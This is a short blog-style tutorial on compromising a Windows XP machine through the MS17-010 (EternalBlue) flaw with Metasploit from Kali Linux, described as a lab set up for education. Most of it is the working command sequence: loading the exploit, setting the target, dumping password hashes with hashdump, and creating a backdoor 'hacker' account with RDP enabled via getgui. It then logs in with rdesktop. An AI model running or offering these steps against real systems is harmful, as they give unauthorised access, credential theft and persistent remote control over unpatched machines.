Here are the steps to exploit MS17_010 in Windows XP. Please use this as educational purposes only. Here are the setup of the virtual environment. We are only going to be using KALI linux (192.168.1.2) to exploit Windows XP (192.168.1.180)
Step 1. Login to Kali Linux
Login to your Kali linux directly or access them via ssh. Then type the following
msfconsole
This will load the metasploit framework as shown in the following picture
Step 2. Load the Eternal exploit
From the msf5 console above type the following command
msf5 > search eternal
Once you see the list of exploit, select option 4 by typing
msf5 > use 4
Step 3. Load the information for the host and perform the exploit
Type the following command one after another to :
set RHOST 192.168.1.180
set Target 2
run
hashdump
run getgui -e -u hacker -p password
The command above will perform the exploit and inserting a username “hacker” with password “password” into the XP machine with IP address of 192.168.1.180
Step 4. Validate the successful hack by terminal service to the XP machine
Now that the attack had been completed successfully we can use the following command to login to the XP Machine
rdesktop -u hacker -p password -r clipboard -a 16 -g 800x600 192.168.1.180
You should be able to login successfully as shown in the following picture.
I hope you like this post, for the detail instruction you can watch the following video